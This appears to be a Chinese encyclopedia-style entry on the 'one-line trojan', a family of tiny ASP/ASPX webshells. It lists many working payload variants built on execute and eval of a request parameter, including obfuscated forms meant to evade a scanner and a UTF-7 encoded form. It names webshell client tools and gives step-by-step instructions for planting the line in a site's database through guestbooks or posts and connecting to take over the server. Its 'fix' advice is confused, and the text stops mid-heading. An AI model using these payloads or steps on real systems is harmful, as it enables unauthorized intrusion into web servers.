一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

中文名

一句话木马

外文名

\u003c%execute request(\"value\")%>

特点

隐蔽性非常好

解决方法

用\"eval\"替换掉\"execute\"服务端

举例说明

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

<%execute request("value")%>

其中value是值,所以你可以更改自己的值,前面的request就是获取这个值

<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)

当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)

这就被称为一句话木马,它是基于B/S结构的。

写法

常用一句话木马

asp一句话木马:

<%execute(request("value"))%>

php一句话木马:

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"])%>

其他一句话木马:

<%eval request("value")%>

<%execute request("value")%>

<%execute(request("value"))%>

<%If Request("value")<>"" Then Execute(Request("value"))%>

<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"],"unsafe");%>

可以躲过雷客图的一句话木马:

<%

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""value""))")

%>

不用'<,>'的asp一句话木马:

不用

双引号

的一句话木马:

<%eval request(chr(35))%>

UTF-7

编码加密:

<%@codepage=65000%><%response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

客户端

一句话最常用的客户端为:

一句话客户端增强版

中国菜刀

lanker一句话客户端

ZV新型PHP一句话木马客户端GUI版

使用方法

首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.

记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!

然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

木马原理

首先